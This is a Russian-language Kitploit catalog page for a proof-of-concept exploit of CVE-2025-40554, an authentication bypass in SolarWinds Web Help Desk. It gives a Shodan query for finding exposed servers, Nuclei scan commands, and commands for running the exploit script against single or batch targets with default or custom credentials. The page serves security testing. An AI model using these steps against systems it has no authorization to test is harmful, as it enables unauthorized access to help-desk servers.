Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/imbas007/auth-bypass-cve-2025-40554
Аутентификация и авторизацияСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubimbas007/auth-bypass-cve-2025-40554

auth-bypass-CVE-2025-40554

Эксплойт для доказательства концепции для CVE-2025-40554, обход аутентификации в SolarWinds Web Help Desk. Включает шаблон Nuclei и эксплойт на Python для тестирования одиночных или пакетных целей с опциональным входом по учетным данным.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
16 месяцев назадЕщё не проверено

CVE-2025-40554 – SolarWinds Web Help Desk Обход аутентификации PoC

Shodan запрос

root@kitploit:~
http.favicon.hash:"1895809524"

Nuclei

root@kitploit:~
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
root@kitploit:~
pip install -r requirements.txt

Использование

Одиночная цель (обход + вход, по умолчанию client/client):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443
image

Одиночная цель с пользовательскими учетными данными:

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass

Одиночная цель, только обход (без входа):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login

Список целей (сохраняет только уязвимые+вход):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt

Список целей с пользовательскими учетными данными:

root@kitploit:~
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret

Тихий режим (выводить только URL-адреса, где вход выполнен успешно):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt -q

Отказ от ответственности

Этот PoC предназначен только для авторизованных исследований и тестирования безопасности. Несанкционированный доступ к компьютерным системам является незаконным. Авторы не несут ответственности за неправомерное использование.

Скачать инструмент